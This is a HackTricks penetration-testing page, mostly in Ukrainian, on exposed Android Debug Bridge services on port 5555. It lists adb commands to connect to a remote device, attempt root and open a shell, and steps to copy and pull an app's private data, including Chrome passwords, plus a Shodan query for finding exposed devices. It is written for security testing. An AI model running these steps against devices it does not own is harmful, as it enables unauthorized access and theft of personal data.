5555 - Android Debug Bridge
Reading time: 2 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Основна інформація
З документації:
Android Debug Bridge (adb) - це універсальний інструмент командного рядка, який дозволяє вам спілкуватися з пристроєм. Команда adb полегшує виконання різноманітних дій з пристроєм, таких як встановлення та налагодження додатків, а також надає доступ до оболонки Unix, яку ви можете використовувати для виконання різних команд на пристрої.
Порт за замовчуванням: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Підключення
Якщо ви знайдете службу ADB, що працює на порту пристрою, і зможете підключитися до неї, ви зможете отримати оболонку всередині системи:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
Для отримання додаткових команд ADB перегляньте наступну сторінку:
Вивантаження даних програми
Щоб повністю завантажити дані програми, ви можете:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
Ви можете використовувати цей трюк, щоб отримати чутливу інформацію, таку як паролі chrome. Для отримання додаткової інформації про це перевірте інформацію в наданих посиланнях тут.
Shodan
android debug bridge
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.